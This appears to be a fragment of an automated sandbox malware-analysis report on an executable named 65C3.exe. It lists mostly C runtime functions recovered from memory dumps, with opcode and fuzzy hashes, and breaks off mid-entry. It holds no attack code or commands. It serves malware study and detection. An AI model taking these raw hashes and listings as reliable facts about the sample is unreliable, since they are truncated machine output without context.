                                                                                                                                                                                        • Part of subcall function 01060F50: _free.LIBCMT ref: 0106100F
                                                                                                                                                                                        • Part of subcall function 01060F50: _free.LIBCMT ref: 01061021
                                                                                                                                                                                        • Part of subcall function 01060F50: _free.LIBCMT ref: 01061033
                                                                                                                                                                                        • Part of subcall function 01060F50: _free.LIBCMT ref: 01061045
                                                                                                                                                                                      • _free.LIBCMT ref: 010613AC
                                                                                                                                                                                        • Part of subcall function 0105D301: HeapFree.KERNEL32(00000000,00000000,?,010610E1,?,00000000,?,?,?,01061108,?,00000007,?,?,0106150A,?), ref: 0105D317
                                                                                                                                                                                        • Part of subcall function 0105D301: GetLastError.KERNEL32(?,?,010610E1,?,00000000,?,?,?,01061108,?,00000007,?,?,0106150A,?,?), ref: 0105D329
                                                                                                                                                                                      • _free.LIBCMT ref: 010613CE
                                                                                                                                                                                      • _free.LIBCMT ref: 010613E3
                                                                                                                                                                                      • _free.LIBCMT ref: 010613EE
                                                                                                                                                                                      • _free.LIBCMT ref: 01061410
                                                                                                                                                                                      • _free.LIBCMT ref: 01061423
                                                                                                                                                                                      • _free.LIBCMT ref: 01061431
                                                                                                                                                                                      • _free.LIBCMT ref: 0106143C
                                                                                                                                                                                      • _free.LIBCMT ref: 01061474
                                                                                                                                                                                      • _free.LIBCMT ref: 0106147B
                                                                                                                                                                                      • _free.LIBCMT ref: 01061498
                                                                                                                                                                                      • _free.LIBCMT ref: 010614B0
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 161543041-0
                                                                                                                                                                                      • Opcode ID: cfd0e3c9e75ea37f34bce316ae7bfb80f76a9b0302a2cbc37af65d91b2621846
                                                                                                                                                                                      • Instruction ID: 15cf02d577466de1b44d9b4069cc1d95ba514d1a7f0f60365271b3e8e1c12900
                                                                                                                                                                                      • Opcode Fuzzy Hash: cfd0e3c9e75ea37f34bce316ae7bfb80f76a9b0302a2cbc37af65d91b2621846
                                                                                                                                                                                      • Instruction Fuzzy Hash: 2D316D316003019FEBA1AA7ED988B9B77EDEF80350F14C4AAE9D9D7551DE31E840C710
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 01058972
                                                                                                                                                                                      • type_info::operator==.LIBVCRUNTIME ref: 01058999
                                                                                                                                                                                      • ___TypeMatch.LIBVCRUNTIME ref: 01058AA5
                                                                                                                                                                                      • IsInExceptionSpec.LIBVCRUNTIME ref: 01058B80
                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 01058C07
                                                                                                                                                                                      • CallUnexpected.LIBVCRUNTIME ref: 01058C22
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                      • String ID: csm$csm$csm
                                                                                                                                                                                      • API String ID: 2123188842-393685449
                                                                                                                                                                                      • Opcode ID: 21b6e9f674039799b47e148bf409d874b50d29e450b560806abae961c46f4a38
                                                                                                                                                                                      • Instruction ID: 0119dc7fd59a51284bef039f9b6506252db46d396a30d25213d1a4f31aadaa4b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 21b6e9f674039799b47e148bf409d874b50d29e450b560806abae961c46f4a38
                                                                                                                                                                                      • Instruction Fuzzy Hash: 00C17A7180020AEFDF95DF9AD8809AFBBB9BF18315F04859AEC816B211D731D951CB92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DAF0
                                                                                                                                                                                        • Part of subcall function 0105D301: HeapFree.KERNEL32(00000000,00000000,?,010610E1,?,00000000,?,?,?,01061108,?,00000007,?,?,0106150A,?), ref: 0105D317
                                                                                                                                                                                        • Part of subcall function 0105D301: GetLastError.KERNEL32(?,?,010610E1,?,00000000,?,?,?,01061108,?,00000007,?,?,0106150A,?,?), ref: 0105D329
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DAFC
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DB07
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DB12
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DB1D
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DB28
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DB33
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DB3E
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DB49
                                                                                                                                                                                      • _free.LIBCMT ref: 0105DB57
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: e0d2d684199af19d7694372c7e190af28b5c71a2eb409bf42d12b21bb8134678
                                                                                                                                                                                      • Instruction ID: 7a9ea7698ba4051b259fb2b822cf4fe158120e24796a42fab7f93adff8f82c43
                                                                                                                                                                                      • Opcode Fuzzy Hash: e0d2d684199af19d7694372c7e190af28b5c71a2eb409bf42d12b21bb8134678
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F217776901109AFCB81EFD5C885DDE7BB9FF18344F0181A6E955DB121EB32EA54CB80
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: efffe41dfba315b78ef971fc52d1c05c3e1983c25dde3a152451d4850c5ced94
                                                                                                                                                                                      • Instruction ID: 547c311ebc4a466fa40da7d64138b695512be203300e6632db321194f8b93150
                                                                                                                                                                                      • Opcode Fuzzy Hash: efffe41dfba315b78ef971fc52d1c05c3e1983c25dde3a152451d4850c5ced94
                                                                                                                                                                                      • Instruction Fuzzy Hash: 76C1F270E042469FEB21CF9CDC94BAE7BFABF49354F044099E984AB281CB359941CF60
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$___from_strstr_to_strchr
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3409252457-0
                                                                                                                                                                                      • Opcode ID: ea5c9d81814e06b85d1f93fd502057e1523d2140b8b13fee41c6c1cbde8a40f2
                                                                                                                                                                                      • Instruction ID: 7a6d3c1eac019de4ebd5b7dc77d927492f1406f8a5be410650cedcab851ae67d
                                                                                                                                                                                      • Opcode Fuzzy Hash: ea5c9d81814e06b85d1f93fd502057e1523d2140b8b13fee41c6c1cbde8a40f2
                                                                                                                                                                                      • Instruction Fuzzy Hash: BC51F971D85306AFFB61EF799840AAE7BEDAF00324F14419AF9D097185EB369100CB61
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 01058257
                                                                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 0105825F
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 010582E8
                                                                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 01058313
                                                                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 01058368
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                      • String ID: csm
                                                                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                                                                      • Opcode ID: 9313a640519c398cbcfeadff295a8ca18bbf5acb09e12b783fc1e46427b887ab
                                                                                                                                                                                      • Instruction ID: c5f16ac05d474c7374dc77d5b747afcb111528e71236bcd38a9451aea508b604
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9313a640519c398cbcfeadff295a8ca18bbf5acb09e12b783fc1e46427b887ab
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C41B234A00609EBCF90DF6AC884A9FBFB5BF44368F14C196ED945B352D7319A11CB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                                      • API String ID: 0-537541572
                                                                                                                                                                                      • Opcode ID: 9be1104c0a6c55675ce186dfac022f6adc1f71afe0dbd799be5510fab695ee59
                                                                                                                                                                                      • Instruction ID: 3e6aea6e3784257523d77878f06b492c89157d554cb89511eb6628fce3450aa9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9be1104c0a6c55675ce186dfac022f6adc1f71afe0dbd799be5510fab695ee59
                                                                                                                                                                                      • Instruction Fuzzy Hash: F721D831E05321BBEBB29AA8AC44A9B37989F01770F110552FDD6AB291E735DD00C7E0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 010610B7: _free.LIBCMT ref: 010610DC
                                                                                                                                                                                      • _free.LIBCMT ref: 0106113D
                                                                                                                                                                                        • Part of subcall function 0105D301: HeapFree.KERNEL32(00000000,00000000,?,010610E1,?,00000000,?,?,?,01061108,?,00000007,?,?,0106150A,?), ref: 0105D317
                                                                                                                                                                                        • Part of subcall function 0105D301: GetLastError.KERNEL32(?,?,010610E1,?,00000000,?,?,?,01061108,?,00000007,?,?,0106150A,?,?), ref: 0105D329
                                                                                                                                                                                      • _free.LIBCMT ref: 01061148
                                                                                                                                                                                      • _free.LIBCMT ref: 01061153
                                                                                                                                                                                      • _free.LIBCMT ref: 010611A7
                                                                                                                                                                                      • _free.LIBCMT ref: 010611B2
                                                                                                                                                                                      • _free.LIBCMT ref: 010611BD
                                                                                                                                                                                      • _free.LIBCMT ref: 010611C8
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 776569668-0
                                                                                                                                                                                      • Opcode ID: 6ccc4a6451bcc94a5aac7198432d5b88d6d212664f84590575e23b9ce73248a4
                                                                                                                                                                                      • Instruction ID: 392824d2081ee4966e7347529469bc019a0c57af160f67f2889d343b50622842
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ccc4a6451bcc94a5aac7198432d5b88d6d212664f84590575e23b9ce73248a4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E11DD31A05B45BAEF30BBF0CC49FCB779CAF62300F40491AF6D9A6091DAB6B4008742
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetConsoleCP.KERNEL32(?,01045020,00000000), ref: 010627F2
                                                                                                                                                                                      • __fassign.LIBCMT ref: 010629D1
                                                                                                                                                                                      • __fassign.LIBCMT ref: 010629EE
                                                                                                                                                                                      • WriteFile.KERNEL32(?,01045020,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 01062A36
                                                                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01062A76
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01062B22
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FileWrite__fassign$ConsoleErrorLast
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 4031098158-0
                                                                                                                                                                                      • Opcode ID: f225ad750858e41fb04182183edc8fd4b0af613413b830735c0dde2b4f2149c4
                                                                                                                                                                                      • Instruction ID: a5dc24872daa9c4713f54d55e6af9517f2cbf97aedaf47ed6b64a6a028fec726
                                                                                                                                                                                      • Opcode Fuzzy Hash: f225ad750858e41fb04182183edc8fd4b0af613413b830735c0dde2b4f2149c4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 29D1CC71D012599FDF15CFA8C8809EDBBB9FF48314F28016AE895FB241D631AA46CF60
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetLastError.KERNEL32(?,?,01058537,01058126,01057775), ref: 0105854E
                                                                                                                                                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0105855C
                                                                                                                                                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01058575
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,01058537,01058126,01057775), ref: 010585C7
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3852720340-0
                                                                                                                                                                                      • Opcode ID: 8a2a559689f9a8c0ef7f32dfb4226dac7b22e7e977600c5e94bc4ea94d29347d
                                                                                                                                                                                      • Instruction ID: bdf1f4838f4707cb4513a3ff18225d9e31145e16e09fe7ae034d45702843bdd2
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8a2a559689f9a8c0ef7f32dfb4226dac7b22e7e977600c5e94bc4ea94d29347d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4201FC3261A3129EA7F6197AACC89573BD4FF516FD320432FFDE0641D8EF2648005680
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\65C3.exe, xrefs: 0105FCE4
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\65C3.exe
                                                                                                                                                                                      • API String ID: 0-3175184710
                                                                                                                                                                                      • Opcode ID: 2f16f18e63452e1d3d4941e367914ea4a01dce399f83cad1371064465b0fdb38
                                                                                                                                                                                      • Instruction ID: fdfe6879c1da062c8a7ba05635fac04e90cbb09d13df8d87ffcf1b8f4aaf1588
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2f16f18e63452e1d3d4941e367914ea4a01dce399f83cad1371064465b0fdb38
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A21BE7160021BBFDBE1BF6ACC809ABB7EEAF442A47108514FDE5D6150DB24ED408BB0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _wcsrchr
                                                                                                                                                                                      • String ID: .bat$.cmd$.com$.exe
                                                                                                                                                                                      • API String ID: 1752292252-4019086052
                                                                                                                                                                                      • Opcode ID: 0496f8e74cf82c0a348bf43af19659c9fb01bc19d3f529684dc28173281bd022
                                                                                                                                                                                      • Instruction ID: a2e2bef61485fb40f24fd4dc39ba126ff2efbdd1c597a64bc926b5d75d0db261
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0496f8e74cf82c0a348bf43af19659c9fb01bc19d3f529684dc28173281bd022
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9401D63760461B2537F5101EAD16A6777DE9B95AF0765402EFDC4FB681EE44E8020298
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: api-ms-
                                                                                                                                                                                      • API String ID: 0-2084034818
                                                                                                                                                                                      • Opcode ID: 91f617c15e79567a8b898fd2854b1ad49e6aaed74f76b6d846d4060f7036b0ed
                                                                                                                                                                                      • Instruction ID: 2c90b7bda8dd0d19cb587e601261861a051f1cc91f4c74856c6da25438a2ecb0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 91f617c15e79567a8b898fd2854b1ad49e6aaed74f76b6d846d4060f7036b0ed
                                                                                                                                                                                      • Instruction Fuzzy Hash: BE11B675A01325EBDBB28B6DDC84AAF37989B096BCF110150ED86AB291D734ED04C6F0
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0105A688,0105DCAE,?,0105A650,0105ABD6,?,0105DCAE), ref: 0105A6A8
                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0105A6BB
                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,0105A688,0105DCAE,?,0105A650,0105ABD6,?,0105DCAE), ref: 0105A6DE
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000E.00000002.490254347.0000000001041000.00000020.00000001.01000000.00000008.sdmp, Offset: 01040000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000E.00000002.489931630.0000000001040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491303628.000000000106E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491324881.0000000001078000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000E.00000002.491405430.000000000107D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_14_2_1040000_65C3.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                      • Opcode ID: de5651d35cfa5f9dbb13834f95bfff89481b7c04ca3aa9e7762e7f82cdebb0ef
                                                                                                                                                                                      • Instruction ID: 7fcadfeaa0c94d440251f8557dab0acf427bfaa66469e6ef4c4c95a5e7fd57bd
